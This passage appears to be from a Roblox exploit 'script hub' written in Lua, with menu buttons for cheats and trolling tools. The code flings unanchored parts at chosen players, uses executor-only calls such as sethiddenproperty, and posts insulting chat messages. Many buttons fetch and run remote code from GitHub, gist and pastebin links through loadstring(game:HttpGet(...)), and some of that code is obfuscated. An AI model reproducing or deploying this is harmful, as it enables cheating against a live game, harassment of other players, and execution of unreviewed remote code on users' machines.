end if Key.KeyCode == Enum.KeyCode.Space and not Chat then climb() end end) if TouchGui then TouchGui:WaitForChild("TouchControlFrame"):WaitForChild("JumpButton").MouseButton1Click:Connect(function() if not holding then return end climb() end) end while true do repeat rs.RenderStepped:Wait() until sliding == false rs.RenderStepped:Wait() local r = Ray.new(root.Position,root.CFrame.LookVector*-6) local hit,ray = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(r,ignorelist) if hit then backhit = true else backhit = false end if camerakill == true then return end if hum.FloorMaterial == Enum.Material.Air then if landed == true then landed = false end else if landed == false then landed = true landdeler() end end local killx,killy,killz = root.CFrame:ToEulerAnglesYXZ() local nobadcf = CFrame.new(root.Position)*CFrame.Angles(0,killy,0) local rclimber = Ray.new(Head.CFrame.p, nobadcf.LookVector * 6) local killclimberray = Ray.new(Head.CFrame.p+Vector3.new(0,0.5,0), nobadcf.LookVector * 9) local killmansraypart,killmansposition game:GetService("Workspace"):FindPartOnRayWithIgnoreList(killclimberray,ignorelist) local part,position = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(rclimber,ignorelist) if not killmansraypart then if part and ledgeavailable and not holding and not killmansraypart then if part.Size.Y >= 4 and part.CanCollide == true and killmansraypart == nil and part.Transparency ~= 1 then if Head.Position.Y >= (part.Position.Y + (part.Size.Y / 2)) - 1 and Head.Position.Y <= part.Position.Y + (part.Size.Y / 2) and Hum.FloorMaterial == Enum.Material.Air and sliding == false and downed == false and wallrunning == true then if HA.IsPlaying == false then wallrunning = false root.CFrame = nobadcf randomclothrollsound(false) HA:Play() wallrunning = false HA:AdjustSpeed(0) HA.TimePosition = 1.3 end Root.Anchored = true holding = true ledgeavailable = false end end end end local r = Ray.new(root.Position,Vector3.new(0,1,0).Unit*-5.5) local hit,ray = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(r,ignorelist) if hit then floorpositiony = ray.Y if hitfloor == false then hitfloor = true if root.Velocity.Y < -60 then if cdown == true then root.Velocity = Vector3.new(root.Velocity.X,-10,root.Velocity.Z) cdown = false roll() else if root.Velocity.Y < -90 then downer() end end end end else if hitfloor == true then hitfloor = false end end local r = Ray.new(root.Position,root.CFrame.LookVector*1.8) local hit,ray,rp = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(r,ignorelist) if hit then fronthit = true rppos = rp else fronthit = false end if hitfloor == true then if cdown == true then if flow < flowmin+5 then if flow ~= crouchspeed then flow = crouchspeed end if crouchingplay.IsPlaying == false then crouchingplay:Play() randomclothrollsound() end else if landed == true then slide() end end end end if cdown == false then if crouchingplay.IsPlaying == true then crouchingplay:Stop() end if walkingmode == false and hum.MoveDirection ~= Vector3.new(0,0,0) or wallrunning == true then flow = flow+flowmax/70 if tricksinarow > 8 then if combatmusic.Volume ~= 0.5 then combatmusic.Volume = 0 ambience.Volume = 0 explorationmusic.Volume =0.5 end end if timestanding ~= 0 then timestanding = 0 end if flow > flowmax then flow = flowmax end else flow = flow-flowmax/23 if combatmusic.Volume ~= 0.5 then timestanding = timestanding+0.05 end if timestanding > 18 then timestanding = 0 tricksinarow = 0 if combatmusic.Volume ~= 0.5 then if ambience.Volume ~= 0.5 then ambience.Volume = 0.5 explorationmusic.Volume = 0 combatmusic.Volume = 0 end end end if flow < flowmin then flow = flowmin end end end if downed == false then hum.WalkSpeed = flow else hum.WalkSpeed = 1 end end end }) Main:AddButton({ Title = "FE Toggle kill brick", Description = "made by ooga booga press z to toggle", Callback = function() -- Z to Toggle local player = game:GetService("Players").LocalPlayer local UIS = game:GetService("UserInputService") local myzaza = false UIS.InputBegan:Connect(function(input, GPE) if GPE then return end if input.KeyCode == Enum.KeyCode.Z then myzaza = not myzaza end end) while task.wait() do local parts = game:GetService("Workspace"):GetPartBoundsInRadius(player.Character:WaitForChild("HumanoidRootPart").Position, 10) for _, part in ipairs(parts) do part.CanTouch = myzaza end end end }) Main:AddButton({ Title = "FE Fast Travel", Description = "press x", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yeerma/fff/main/make-a-CW-on-oooga-booga'))() end }) Main:AddButton({ Title = "FE auto excuse", Description = "basically when u die it execuses", Callback = function() getgenv().dmsgs = { deathmessages = {"i was lagging", "that wasnt fair", "You will pay for this", "What a noob", "I will not let you get away with that", "Are you serious dude", "You will regret this", "That is a grave mistake", "I will make you suffer you little ****", "You son of a ****", "Are you out of your mind", "What the hell is wrong with you","I will find you","That isn't nice dude","Karma will hit you back"} } --[[ Auto-Excuse by flamespill#7488 ]]-- loadstring(game:HttpGet("https://raw.githubusercontent.com/goldmoments/auto-excuse/main/Script"))("Auto-Excuse Script | flamespill#7488") end }) Main:AddButton({ Title = "FE message on damage", Description = "chat when u take damage", Callback = function() getgenv().hurtmessages = { "That hurt!", "Watch where you're swinging!", "Ow! That's gonna leave a mark!", "Stop attacking me!", "I'm not feeling so good...", "Is that all you've got?", "Can't catch a break!", "That was a cheap shot!", "You'll regret that!" } loadstring(game:HttpGet("https://raw.githubusercontent.com/dta-bse/v3rm/main/Message%20on%20damage"))() end }) Main:AddButton({ Title = "FE Collision Enabler", Description = "enables collision LOCALLY in non collision games", Callback = function() --makes it so that you can collide with players and their limbs (Use with scripts like Snake) --NOTE: collision is not server sided and only happens on your client (Fling scripts only work on you not others) LP = game.Players.LocalPlayer while wait(3) do for i,v in pairs(game.Players:GetDescendants()) do if v:IsA("Player") and game:GetService("Workspace"):FindFirstChild(v.Name) and v ~= LP and workspace[v.Name]:FindFirstChild("CHECKER") == nil then checker = Instance.new("BoolValue",workspace[v.Name]) checker.Name = "CHECKER" for i,v in pairs(game:GetService("Workspace"):WaitForChild(v.Name):GetDescendants()) do if v:IsA("Part") or v:IsA("MeshPart") then local collider = Instance.new("Part",v) collider.Size = v.Size collider.Position = v.Position collider.Transparency = 1 local weld = Instance.new("Weld",v) weld.Part0 = v weld.Part1 = collider end end end end end end }) Main:AddButton({ Title = "FE Chat article on death", Description = "chat a random wikipedia article when u die", Callback = function() --//Initialization\\-- local ReplicatedStorage = game:GetService("ReplicatedStorage"); local HttpService = game:GetService("HttpService"); local RunService = game:GetService("RunService"); local Players = game:GetService("Players"); local LPlayer = Players.LocalPlayer; local ChatEvent = ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest; local MaxQueueSize = 2; local Queue = {};--For people with slow internet (like me), the message can take 5 seconds to load --before being sent, which is really anti-climactic, so I store them in a queue ;w; --//Functions\\-- local function ExtractMainText(ArticleTitle: string)--Gets the main text sentence of the Wikipedia Article. local APIURL = "https://en.wikipedia.org/w/api.php?action=query&format=json&titles=ARTICLE_TITLE&prop=extracts&exintro&explaintext"; APIURL = APIURL:gsub("ARTICLE_TITLE", ArticleTitle:gsub(" ", "_"));--Puts the title in the link. local Data = game:HttpGet(APIURL); Data = HttpService:JSONDecode(Data); local ArticleID, Data = next(Data["query"]["pages"]); return Data["extract"];--Gets the raw text of the article. end; local function GetRandomArticle() local Content = game:HttpGet("https://en.wikipedia.org/wiki/Special:Random"); local Title = Content:sub(Content:find("") + #("<title>"), Content:find(" - Wikipedia") - 2); return Title; end; local function AddToQueue()--Adds one article to the queue (preloads them for people with slow internet) local Title = GetRandomArticle(); warn(Title); local Text = ExtractMainText(Title); if (#Text > 300) then Text = Text:sub(1, Text:find("%.")); end; Queue[#Queue+1] = Text; end; local function ChatArticle() if (#Queue) <= 0 then return false; end; local Article = table.remove(Queue, 1); ChatEvent:FireServer(Article, "All"); return true; end; local function Connection(Character: Model) local Humanoid = Character:FindFirstChildOfClass("Humanoid"); while (not Humanoid) do RunService.Heartbeat:Wait(); Humanoid = Character:FindFirstChildOfClass("Humanoid"); end; Humanoid.Died:Wait(); ChatArticle(); repeat pcall(AddToQueue); until (#Queue >= MaxQueueSize); end; task.spawn(Connection, LPlayer.Character); LPlayer.CharacterAdded:Connect(Connection); for _ = 1, MaxQueueSize do AddToQueue(); end; warn("Loaded ", MaxQueueSize, " Articles"); end }) GUIS:AddButton({ Title = "Nullware Hub V3", Description = "Reanimations", Callback = function() local LocalPlayer = game:GetService("Players").LocalPlayer local Heartbeat = game:GetService("RunService").Heartbeat Heartbeat:Connect(function() LocalPlayer.MaximumSimulationRadius = math.huge sethiddenproperty(LocalPlayer, "SimulationRadius", math.huge) end) -- Script above is a fix to limbs falling -- -- Nullware Hub V3 | -- getgenv().Theme = "Purple" -- To change the UI Theme, set this to one of the following options: "Red", "Purple", "Blue", "Green", "Yellow" loadstring(game:HttpGet("https://gist.githubusercontent.com/M6HqVBcddw2qaN4s/2d722888a388017c18028cd434c43a25/raw/dcccf1027fe4b90780e47767aaf584389c9d7771/EULma3fU90PUOKUn?identifier=" .. (function() local a = "" for b = 1, 256 do local c = math.random(1, 3) a = a .. string.char(c == 1 and math.random(48, 57) or c == 2 and math.random(97, 122) or c == 3 and math.random(65, 90)) end; return a end)()))() end }) GUIS:AddButton({ Title = "Pendulum Hub V5", Description = "Reanimations", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Tescalus/Pendulum-Hubs-Source/main/Pendulum%20Hub%20V5.lua'))() Fluent:Notify({ Title = "Warning", Content = "You Need hats for this idk where to get them but um go find them?", SubContent = "", -- Optional Duration = 5 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GUIS:AddButton({ Title = "Ultimate Trolling Gui", Description = "by FE", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/Scripts/main/aaa"))() end }) GUIS:AddButton({ Title = "Unanchored parts gui", Description = "teleport unanchored parts to players n other shit", Callback = function() --TOMQ-SCRIPT-2020 -- prevent from being ran more than once if not _G.ini then _G.ini = true local sound = Instance.new("Sound") sound.SoundId = "rbxassetid://216917652" sound.Parent = game:GetService("SoundService") sound:Play() teleport = false wait() game.StarterGui:SetCore("SendNotification", { Title = "Unanchored To Player"; -- the title (ofc) Text = "GUI Loaded - F to Hide/Show"; -- what the text says (ofc) Duration = 5; -- how long the notification should in secounds }) print "================UNANCHORED TO PLAYER LOADED================" print "================MADE BY TomQ#6764================" local heartbeat = game:GetService("RunService").Heartbeat spawn(function() while true do heartbeat:Wait() game:GetService("Players").LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge)*math.huge sethiddenproperty(game:GetService("Players").LocalPlayer,"SimulationRadius",math.pow(math.huge,math.huge)*math.huge) game:GetService("RunService").Stepped:wait() end end) local Imput = game:GetService("UserInputService") local Plr = game:GetService("Players").LocalPlayer local Mouse = Plr:GetMouse() function To(position) local Chr = Plr.Character local sound2 = Instance.new("Sound") sound2.SoundId = "rbxassetid://3398620867" sound2.Parent = game:GetService("SoundService") if Chr ~= nil then if teleport == false then for index, part in pairs(game:GetDescendants()) do if part:IsA("BasePart" or "UnionOperation" or "Model") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false then --// Checks Part Properties part.CFrame = CFrame.new(position) --TP Part To Mouse sound2:Play() if spam == true and part:FindFirstChild("BodyGyro") == nil then local bodyPos = Instance.new("BodyPosition") bodyPos.Position = part.Position bodyPos.MaxForce = Vector3.new(math.huge, math.huge, math.huge) bodyPos.P = 1e6 bodyPos.Parent = part end end end else Chr:MoveTo(position) end end end Imput.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 and Imput:IsKeyDown(Enum.KeyCode.LeftControl) then To(Mouse.Hit.p) end end) -- key that opens/closes the ui local toggle_key = Enum.KeyCode.F -- function that executes desired code execute = function(name) for index, part in pairs(game:GetDescendants()) do if part:IsA("BasePart" or "UnionOperation" or "Model") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false then --// Checks Part Properties part.CFrame = CFrame.new(game:GetService("Workspace")[name].Head.Position) --TP Part To User if spam == true and part:FindFirstChild("BodyGyro") == nil then local bodyPos = Instance.new("BodyPosition") bodyPos.Position = part.Position bodyPos.MaxForce = Vector3.new(math.huge, math.huge, math.huge) bodyPos.P = 1e6 bodyPos.Parent = part end end end end local uis = game:GetService("UserInputService") local ts = game:GetService("TweenService") -- ui functions fade = function(obj, len, props) ts:Create(obj, TweenInfo.new(len, Enum.EasingStyle.Sine), props):Play() end -- shorthand variables local u2, c3 = UDim2.new, Color3.fromRGB local u2f, c3w = u2(1, 0, 1, 0), c3(255, 255, 255) -- ui init local g = Instance.new("ScreenGui", game:GetService("CoreGui")) local f = Instance.new("Frame", g) local t = Instance.new("TextLabel", f) local c = Instance.new("ScrollingFrame", f) -- core ui styling local padding = Instance.new("UIPadding", f) local maxsize = Instance.new("UISizeConstraint", f) local textsize = Instance.new("UITextSizeConstraint", t) local listcons = Instance.new("UIListLayout", c) padding.PaddingBottom = UDim.new(0, 8) padding.PaddingLeft = UDim.new(0, 15) padding.PaddingRight = UDim.new(0, 15) padding.PaddingTop = UDim.new(0, 0) maxsize.MaxSize = Vector2.new(275, 450) maxsize.MinSize = Vector2.new(200, 0) textsize.MaxTextSize = 16 listcons.Padding = UDim.new(0, 3) -- ui instance properties g.Name = "unanchor_ui" g.ResetOnSpawn = false f.Name = "main" t.Name = "header" f.Size = u2(0.165, 0, 0.6, 0) f.BorderSizePixel = 0 f.BackgroundTransparency = 0.3 f.Position = u2(1, -215, 0.5, -150) f.BackgroundColor3 = c3() f.AnchorPoint = Vector2.new(1, 0.5) f.Position = u2(1, -15, 0.5, 0) t.Size = u2(1, 0, 0.1, 0) t.BackgroundTransparency = 1 t.TextColor3 = c3w t.Font = Enum.Font.GothamBold t.TextScaled = true t.TextXAlignment = Enum.TextXAlignment.Center t.Text = "UNANCHORED TO PLAYER BY TomQ#6764" c.Name = "playerlist" c.Position = u2(0, 0, 0.1, 0) c.Size = u2(1, 0, 0.45, 0) c.BackgroundTransparency = 1 c.BorderSizePixel = 0 c.TopImage = "rbxasset://textures/ui/Scroll/scroll-middle.png" c.BottomImage = "rbxasset://textures/ui/Scroll/scroll-middle.png" c.ScrollingDirection = Enum.ScrollingDirection.Y c.ScrollBarThickness = 5 c.VerticalScrollBarInset = Enum.ScrollBarInset.ScrollBar -- playerlist entry ui template local temp = Instance.new("Frame", f) temp.Name = "temp" temp.Visible = false temp.Size = u2(1, -5, 0, 27) temp.BackgroundTransparency = 0.5 temp.BorderSizePixel = 0 temp.ClipsDescendants = true temp.BackgroundColor3 = c3() local tpad = Instance.new("UIPadding", temp) tpad.PaddingLeft = UDim.new(0, 5) tpad.PaddingRight = UDim.new(0, 5) local tb = Instance.new("TextButton", temp) tb.Name = "button" tb.BackgroundTransparency = 1 tb.ZIndex = 5 tb.BorderSizePixel = 0 tb.Text = "" tb.Size = u2(1, 10, 1, 0) tb.Position = u2(0, -5, 0, 0) local tcl = Instance.new("TextLabel", temp) tcl.Name = "username" tcl.BackgroundTransparency = 1 tcl.BorderSizePixel = 0 tcl.Size = u2f tcl.TextColor3 = c3w tcl.TextXAlignment = Enum.TextXAlignment.Left tcl.TextScaled = true tcl.Size = u2(0.6, 0, 1, 0) tcl.Font = Enum.Font.Gotham local tcls = Instance.new("UITextSizeConstraint", tcl) tcls.MaxTextSize = 14 local thumb = Instance.new("ImageLabel", temp) thumb.Name = "thumb" thumb.Size = u2(0.35, 0, 0.35, 0) thumb.SizeConstraint = Enum.SizeConstraint.RelativeXX thumb.Position = u2(1, 0, 0, -15) thumb.AnchorPoint = Vector2.new(1, 0) thumb.BackgroundTransparency = 1 thumb.BorderSizePixel = 0 -- settings ui local sh = Instance.new("TextLabel", f) sh.Name = "settings_header" sh.Size = u2(1, 0, 0.1, 0) sh.Position = u2(0, 0, 0.55, 0) sh.BackgroundTransparency = 1 sh.BorderSizePixel = 0 sh.ZIndex = 3 sh.TextColor3 = c3w sh.Font = Enum.Font.GothamBold sh.TextScaled = true sh.TextXAlignment = Enum.TextXAlignment.Center sh.Text = "SETTINGS" local shs = Instance.new("UITextSizeConstraint", sh) shs.MaxTextSize = 16 local items = Instance.new("ScrollingFrame", f) items.Name = "items" items.Size = u2(1, 0, 0.35, 0) items.Position = u2(0, 0, 0.65, 0) items.BackgroundTransparency = 1 items.BorderSizePixel = 0 items.TopImage = "rbxasset://textures/ui/Scroll/scroll-middle.png" items.BottomImage = "rbxasset://textures/ui/Scroll/scroll-middle.png" items.ScrollingDirection = Enum.ScrollingDirection.Y items.ScrollBarThickness = 5 items.VerticalScrollBarInset = Enum.ScrollBarInset.ScrollBar local itemll = Instance.new("UIListLayout", items) itemll.Padding = UDim.new(0, 3) createSetting = function(name) local setting = Instance.new("Frame", items) setting.Size = u2(1, -5, 0, 27) setting.BackgroundColor3 = c3() setting.BackgroundTransparency = 0.5 setting.BorderSizePixel = 0 local spad = tpad:Clone() spad.Parent = setting local slab = tcl:Clone() slab.Name = "label" slab.Parent = setting slab.Size = u2(1, 0, 1, 0) slab.Text = name local stbt = tb:Clone() stbt.Parent = setting stbt.MouseEnter:connect(function() fade(setting, 0.25, {BackgroundTransparency = 0.8}) end) stbt.MouseLeave:connect(function() fade(setting, 0.25, {BackgroundTransparency = 0.5}) end) items.CanvasSize = u2(0, 0, 0, itemll.AbsoluteContentSize.Y) return stbt end -- settings & functionality local sound = Instance.new("Sound") sound.SoundId = "rbxassetid://179235828" sound.Parent = game:GetService("SoundService") spam = false local spamblocks = createSetting("Spam Parts") spamblocks.MouseButton1Down:connect(function() spam = not spam if spam then fade(spamblocks.Parent.label, 0.25, {TextColor3 = c3(52, 189, 98)}) sound:Play() -- code to loop here else fade(spamblocks.Parent.label, 0.25, {TextColor3 = c3w}) sound:Play() -- code to break the loop here end end) createSetting("Break Spam").MouseButton1Down:connect(function() for index, part in pairs(game:GetDescendants()) do if part:IsA("BasePart" or "UnionOperation" or "Model") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false then --// Checks Part Properties sound:Play() if part:FindFirstChild("BodyForce") then part.BodyForce:Destroy() end if part:FindFirstChild("BodyGyro") then part.BodyGyro:Destroy() end if part:FindFirstChild("BodyPosition") then part.BodyPosition:Destroy() end if part:FindFirstChild("BodyThrust") then part.BodyThrust:Destroy() end end end end) freeze = false local freezeblocks = createSetting("Freeze Parts") freezeblocks.MouseButton1Down:connect(function() freeze = not freeze if freeze then fade(freezeblocks.Parent.label, 0.25, {TextColor3 = c3(52, 189, 98)}) sound:Play() print "UTP: Freezed Parts" for _,part in pairs(game:GetService("Workspace"):GetChildren()) do if part:IsA("BasePart" or "UnionOperation" or "Model") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false then --// Checks Part Properties local bodyPos = Instance.new("BodyPosition") bodyPos.Position = part.Position bodyPos.MaxForce = Vector3.new(math.huge, math.huge, math.huge) bodyPos.P = 1e6 bodyPos.Parent = part end end else fade(freezeblocks.Parent.label, 0.25, {TextColor3 = c3w}) sound:Play() print "UTP: Thawed Parts" for _,part in pairs(game:GetService("Workspace"):GetChildren()) do if part:IsA("BasePart" or "UnionOperation" or "Model") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false then --// Checks Part Properties if part:FindFirstChild("BodyPosition") then part.BodyPosition:Destroy() end end -- code to break the loop here end end end) local teleportplr = createSetting("Teleport Mode") teleportplr.MouseButton1Down:connect(function() teleport = not teleport if teleport then fade(teleportplr.Parent.label, 0.25, {TextColor3 = c3(52, 189, 98)}) sound:Play() else fade(teleportplr.Parent.label, 0.25, {TextColor3 = c3w}) sound:Play() -- code to break the loop here end end) createSetting("Remove Accessories Mesh").MouseButton1Down:connect(function() sound:Play() local plr = game:GetService("Players").LocalPlayer local char = plr.Character for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if v:IsA("Accessory") and v.Handle:FindFirstChild("SpecialMesh") then ag = v.Handle:FindFirstChild("SpecialMesh") ag:Destroy() end end local plr = game:GetService("Players").LocalPlayer local char = plr.Character for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if v:IsA("Accessory") and v.Handle:FindFirstChild("Mesh") then ag = v.Handle:FindFirstChild("Mesh") ag:Destroy() end end end) createSetting("Drop Accessories").MouseButton1Down:connect(function() sound:Play() for _,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if v:IsA("Accessory") then v.Handle.Parent = workspace v.Parent = workspace end end end) createSetting("Reset").MouseButton1Down:connect(function() sound:Play() game:GetService("Players").LocalPlayer.Character:BreakJoints() end) highlight = false local highlights = createSetting("Highlight Unanchored") highlights.MouseButton1Down:connect(function() highlight = not highlight if highlight then fade(highlights.Parent.label, 0.25, {TextColor3 = c3(52, 189, 98)}) sound:Play() print "UTP: Unanchored Highlighted" for _,part in pairs(game:GetService("Workspace"):GetDescendants()) do if part:IsA("BasePart") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false and part:FindFirstChild("Weld") == nil then --// Checks Part Properties local selectionBox = Instance.new("SelectionBox") selectionBox.Adornee = part selectionBox.Color3 = Color3.new(1,0,0) selectionBox.Parent = part end end else fade(highlights.Parent.label, 0.25, {TextColor3 = c3w}) sound:Play() print "UTP: Unanchored Un-Highlighted" for _,part in pairs(game:GetService("Workspace"):GetDescendants()) do if part:IsA("BasePart") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false and part:FindFirstChild("Weld") == nil then --// Checks Part Properties if part:FindFirstChild("SelectionBox") then part.SelectionBox:Destroy() end end end end end) createSetting("Check Other Players").MouseButton1Down:connect(function() sound:Play() g = 0 spawn(function() print ("Broken function.") end) end) createSetting("Count Unanchored Parts").MouseButton1Down:connect(function() sound:Play() b = 0 for index, part in pairs(game:GetService("Workspace"):GetDescendants()) do if part:IsA("BasePart") and part.Anchored == false and part:IsDescendantOf(game:GetService("Players").LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false and part:FindFirstChild("Weld") == nil then --// Checks Part Properties b = b + 1 end end print ("All parts checked, found", b ,"that are unanchored") end) createEntry = function(name, id) local entry = temp:Clone() entry.Parent = c entry.username.Text = name entry.thumb.Image = game:GetService("Players"):GetUserThumbnailAsync(id, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size100x100) entry.Visible = true entry.LayoutOrder = #c:GetChildren() entry.Name = name local sound = Instance.new("Sound") sound.SoundId = "rbxassetid://3398620867" sound.Parent = game:GetService("SoundService") -- handle clicking for player entry.button.MouseButton1Down:connect(function() execute(name) sound:Play() end) entry.button.MouseEnter:connect(function() fade(entry, 0.25, {BackgroundTransparency = 0.8}) end) entry.button.MouseLeave:connect(function() fade(entry, 0.25, {BackgroundTransparency = 0.5}) end) end deleteEntry = function(name) for _,v in pairs(c:GetChildren()) do if v.Name == name then v:Destroy() end end end -- create entry for client createEntry(game:GetService("Players").LocalPlayer.Name, game:GetService("Players").LocalPlayer.UserId) -- create entries for all other players for _,v in pairs(game:GetService("Players"):GetPlayers()) do if v ~= game:GetService("Players").LocalPlayer then createEntry(v.Name, v.UserId) end end listcons:GetPropertyChangedSignal("AbsoluteContentSize"):connect(function() c.CanvasSize = u2(0, 0, 0, listcons.AbsoluteContentSize.Y) end) itemll:GetPropertyChangedSignal("AbsoluteContentSize"):connect(function() items.CanvasSize = u2(0, 0, 0, itemll.AbsoluteContentSize.Y) end) uis.InputBegan:connect(function(input, gpe) if not gpe then if input.KeyCode == toggle_key then g.Enabled = not g.Enabled end end end) -- dragging code, ripped from https://devforum.roblox.com/t/draggable-property-is-hidden-on-gui-objects/107689/5 local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart f.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end f.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = f.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) f.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) uis.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) game:GetService("Players").PlayerAdded:connect(function(plr) createEntry(plr.Name, plr.UserId) end) game:GetService("Players").PlayerRemoving:connect(function(plr) deleteEntry(plr.Name) end) else print "================ALREADY LOADED================" local sound = Instance.new("Sound") sound.SoundId = "rbxassetid://2130284653" sound.Parent = game:GetService("SoundService") sound:Play() game.StarterGui:SetCore("SendNotification", { Title = "Already Loaded"; -- the title (ofc) Text = "GUI Already Loaded"; -- what the text says (ofc) Duration = 5; -- how long the notification should in secounds }) end end }) GUIS:AddButton({ Title = "Rizz Gui Full", Description = "rizzler", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/mikhailramlal/Rizzer/main/main"))() end }) GUIS:AddButton({ Title = "Rizz Gui Limited", Description = "rizzler", Callback = function() loadstring(game:HttpGet("https://pastebin.com/raw/pPMRh5YJ"))() end }) local GENESIS = Window:AddTab({ Title = "GENESIS", Icon = "globe" }) GENESIS:AddParagraph({ Title = "Warning", Content = "You need hats for these scripts btw" }) GENESIS:AddParagraph({ Title = "Warning: Game Supported?", Content = genesis_supported }) GENESIS:AddParagraph({ Title = "Warning: Do you have correct hats?", Content = genesis_hats }) GENESIS:AddButton({ Title = "Genesis Game", Description = "Free hats in game for the scripts required to run sum scripts also can get hats for the scripts here", Callback = function() game:GetService("TeleportService"):Teleport(14133411956,game:GetService("Players").LocalPlayer) end }) GENESIS:AddButton({ Title = "Genesis Discord", Description = "stay updated on scripts", Callback = function() everyClipboard("https://discord.com/invite/aEZpBEHgMT") Fluent:Notify({ Title = "Copied Discord invite link", Content = "", SubContent = "", -- Optional Duration = 5 -- Set to nil to make the notification not disappear }) end }) GENESIS:AddButton({ Title = "FE Sadist Genocider", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Sadist%20Genocider"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Good Cop Bad Cop", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Good%20Cop%20Bad%20Cop"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Dearsister", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Dearsister"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Neko", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() DisableFlingHealthBar = false loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Neko"))() 